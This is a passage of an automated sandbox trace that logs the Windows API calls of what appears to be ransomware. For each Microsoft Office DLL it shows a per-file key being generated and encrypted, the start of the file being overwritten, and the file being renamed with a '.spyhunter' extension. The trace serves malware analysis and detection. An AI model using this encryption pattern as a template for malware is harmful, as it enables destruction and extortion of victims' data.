pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSUPLD.DLL.spyhunter") returned 74 [0165.993] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSUPLD.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\stsupld.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSUPLD.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\stsupld.dll.spyhunter")) returned 1 [0165.994] GetProcessHeap () returned 0x2c0000 [0165.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.994] GetProcessHeap () returned 0x2c0000 [0165.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.994] GetProcessHeap () returned 0x2c0000 [0165.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05fe8 | out: hHeap=0x2c0000) returned 1 [0165.995] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5f8 | out: pbBuffer=0x25ce5f8) returned 1 [0165.995] GetProcessHeap () returned 0x2c0000 [0165.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.995] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5f0*=0x30) returned 1 [0165.995] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONLNTCOMLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onlntcomlib.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0165.998] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONLNTCOMLIB.DLL") returned 68 [0165.998] StrStrW (lpFirst="ONLNTCOMLIB.DLL", lpSrch=".txt") returned 0x0 [0165.998] GetProcessHeap () returned 0x2c0000 [0165.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0165.999] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce5b4*=0x2800, lpOverlapped=0x0) returned 1 [0166.132] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.132] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce5b4*=0x2800, lpOverlapped=0x0) returned 1 [0166.132] GetProcessHeap () returned 0x2c0000 [0166.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.132] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.132] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5b4, lpOverlapped=0x0 | out: lpBuffer=0x25ce5f4*, lpNumberOfBytesWritten=0x25ce5b4*=0x4, lpOverlapped=0x0) returned 1 [0166.160] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5b4*=0x30, lpOverlapped=0x0) returned 1 [0166.161] CloseHandle (hObject=0xb0) returned 1 [0166.161] GetProcessHeap () returned 0x2c0000 [0166.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.161] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONLNTCOMLIB.DLL.spyhunter") returned 78 [0166.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONLNTCOMLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onlntcomlib.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONLNTCOMLIB.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onlntcomlib.dll.spyhunter")) returned 1 [0166.162] GetProcessHeap () returned 0x2c0000 [0166.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.163] GetProcessHeap () returned 0x2c0000 [0166.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0166.163] GetProcessHeap () returned 0x2c0000 [0166.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7e8b0 | out: hHeap=0x2c0000) returned 1 [0166.163] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5f8 | out: pbBuffer=0x25ce5f8) returned 1 [0166.163] GetProcessHeap () returned 0x2c0000 [0166.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0166.163] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5f0*=0x30) returned 1 [0166.163] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OLKFSTUB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\olkfstub.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0166.164] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OLKFSTUB.DLL") returned 65 [0166.164] StrStrW (lpFirst="OLKFSTUB.DLL", lpSrch=".txt") returned 0x0 [0166.164] GetProcessHeap () returned 0x2c0000 [0166.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.164] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce5b4*=0x2800, lpOverlapped=0x0) returned 1 [0166.222] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.223] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce5b4*=0x2800, lpOverlapped=0x0) returned 1 [0166.223] GetProcessHeap () returned 0x2c0000 [0166.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.223] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.223] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5b4, lpOverlapped=0x0 | out: lpBuffer=0x25ce5f4*, lpNumberOfBytesWritten=0x25ce5b4*=0x4, lpOverlapped=0x0) returned 1 [0166.247] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5b4*=0x30, lpOverlapped=0x0) returned 1 [0166.247] CloseHandle (hObject=0xb0) returned 1 [0166.248] GetProcessHeap () returned 0x2c0000 [0166.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.248] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OLKFSTUB.DLL.spyhunter") returned 75 [0166.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OLKFSTUB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\olkfstub.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OLKFSTUB.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\olkfstub.dll.spyhunter")) returned 1 [0166.249] GetProcessHeap () returned 0x2c0000 [0166.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.249] GetProcessHeap () returned 0x2c0000 [0166.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0166.249] GetProcessHeap () returned 0x2c0000 [0166.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05ca8 | out: hHeap=0x2c0000) returned 1 [0166.249] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5f0 | out: pbBuffer=0x25ce5f0) returned 1 [0166.249] GetProcessHeap () returned 0x2c0000 [0166.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0166.249] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5e8*=0x30) returned 1 [0166.249] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPAUTHZ.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\npauthz.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0166.256] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPAUTHZ.DLL") returned 64 [0166.256] StrStrW (lpFirst="NPAUTHZ.DLL", lpSrch=".txt") returned 0x0 [0166.256] GetProcessHeap () returned 0x2c0000 [0166.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0166.256] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce5ac*=0x2800, lpOverlapped=0x0) returned 1 [0166.276] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.276] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce5ac*=0x2800, lpOverlapped=0x0) returned 1 [0166.276] GetProcessHeap () returned 0x2c0000 [0166.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0166.277] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.277] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5ac, lpOverlapped=0x0 | out: lpBuffer=0x25ce5ec*, lpNumberOfBytesWritten=0x25ce5ac*=0x4, lpOverlapped=0x0) returned 1 [0166.279] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5ac*=0x30, lpOverlapped=0x0) returned 1 [0166.280] CloseHandle (hObject=0xb0) returned 1 [0166.280] GetProcessHeap () returned 0x2c0000 [0166.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.280] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPAUTHZ.DLL.spyhunter") returned 74 [0166.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPAUTHZ.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\npauthz.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPAUTHZ.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\npauthz.dll.spyhunter")) returned 1 [0166.281] GetProcessHeap () returned 0x2c0000 [0166.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.281] GetProcessHeap () returned 0x2c0000 [0166.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0166.281] GetProcessHeap () returned 0x2c0000 [0166.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05a38 | out: hHeap=0x2c0000) returned 1 [0166.281] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5f0 | out: pbBuffer=0x25ce5f0) returned 1 [0166.281] GetProcessHeap () returned 0x2c0000 [0166.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0166.282] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5e8*=0x30) returned 1 [0166.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMECONTROLPROXY.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\namecontrolproxy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0166.282] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMECONTROLPROXY.DLL") returned 73 [0166.282] StrStrW (lpFirst="NAMECONTROLPROXY.DLL", lpSrch=".txt") returned 0x0 [0166.282] GetProcessHeap () returned 0x2c0000 [0166.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0166.283] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce5ac*=0x2800, lpOverlapped=0x0) returned 1 [0166.301] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.301] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce5ac*=0x2800, lpOverlapped=0x0) returned 1 [0166.301] GetProcessHeap () returned 0x2c0000 [0166.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0166.302] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.302] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5ac, lpOverlapped=0x0 | out: lpBuffer=0x25ce5ec*, lpNumberOfBytesWritten=0x25ce5ac*=0x4, lpOverlapped=0x0) returned 1 [0166.305] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5ac*=0x30, lpOverlapped=0x0) returned 1 [0166.305] CloseHandle (hObject=0xb0) returned 1 [0166.305] GetProcessHeap () returned 0x2c0000 [0166.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.305] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMECONTROLPROXY.DLL.spyhunter") returned 83 [0166.305] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMECONTROLPROXY.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\namecontrolproxy.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMECONTROLPROXY.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\namecontrolproxy.dll.spyhunter")) returned 1 [0166.306] GetProcessHeap () returned 0x2c0000 [0166.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.307] GetProcessHeap () returned 0x2c0000 [0166.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0166.307] GetProcessHeap () returned 0x2c0000 [0166.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee5270 | out: hHeap=0x2c0000) returned 1 [0166.307] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5e8 | out: pbBuffer=0x25ce5e8) returned 1 [0166.307] GetProcessHeap () returned 0x2c0000 [0166.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0166.309] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5e0*=0x30) returned 1 [0166.309] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHEV.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\msohev.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0166.310] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHEV.DLL") returned 63 [0166.310] StrStrW (lpFirst="MSOHEV.DLL", lpSrch=".txt") returned 0x0 [0166.310] GetProcessHeap () returned 0x2c0000 [0166.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0166.310] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce5a4*=0x2800, lpOverlapped=0x0) returned 1 [0166.311] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.311] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce5a4*=0x2800, lpOverlapped=0x0) returned 1 [0166.311] GetProcessHeap () returned 0x2c0000 [0166.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0166.311] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.312] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5a4, lpOverlapped=0x0 | out: lpBuffer=0x25ce5e4*, lpNumberOfBytesWritten=0x25ce5a4*=0x4, lpOverlapped=0x0) returned 1 [0166.323] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5a4*=0x30, lpOverlapped=0x0) returned 1 [0166.323] CloseHandle (hObject=0xb0) returned 1 [0166.331] GetProcessHeap () returned 0x2c0000 [0166.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.331] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHEV.DLL.spyhunter") returned 73 [0166.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHEV.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\msohev.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHEV.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\msohev.dll.spyhunter")) returned 1 [0166.332] GetProcessHeap () returned 0x2c0000 [0166.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.332] GetProcessHeap () returned 0x2c0000 [0166.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0166.333] GetProcessHeap () returned 0x2c0000 [0166.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5178 | out: hHeap=0x2c0000) returned 1 [0166.333] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5e8 | out: pbBuffer=0x25ce5e8) returned 1 [0166.333] GetProcessHeap () returned 0x2c0000 [0166.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0166.333] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5e0*=0x30) returned 1 [0166.333] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\INLAUNCH.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\inlaunch.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0166.334] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\INLAUNCH.DLL") returned 65 [0166.334] StrStrW (lpFirst="INLAUNCH.DLL", lpSrch=".txt") returned 0x0 [0166.334] GetProcessHeap () returned 0x2c0000 [0166.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0166.334] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce5a4*=0x2800, lpOverlapped=0x0) returned 1 [0166.337] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.337] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce5a4*=0x2800, lpOverlapped=0x0) returned 1 [0166.337] GetProcessHeap () returned 0x2c0000 [0166.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0166.337] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.337] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5a4, lpOverlapped=0x0 | out: lpBuffer=0x25ce5e4*, lpNumberOfBytesWritten=0x25ce5a4*=0x4, lpOverlapped=0x0) returned 1 [0166.371] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5a4*=0x30, lpOverlapped=0x0) returned 1 [0166.372] CloseHandle (hObject=0xb0) returned 1 [0166.463] GetProcessHeap () returned 0x2c0000 [0166.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.463] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\INLAUNCH.DLL.spyhunter") returned 75 [0166.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\INLAUNCH.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\inlaunch.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\INLAUNCH.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\inlaunch.dll.spyhunter")) returned 1 [0166.464] GetProcessHeap () returned 0x2c0000 [0166.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.464] GetProcessHeap () returned 0x2c0000 [0166.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0166.465] GetProcessHeap () returned 0x2c0000 [0166.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e057c8 | out: hHeap=0x2c0000) returned 1 [0166.465] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5e0 | out: pbBuffer=0x25ce5e0) returned 1 [0166.465] GetProcessHeap () returned 0x2c0000 [0166.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0166.465] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5d8*=0x30) returned 1 [0166.465] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\authzax.dll"), dwDesiredAccess=0xc0000000, 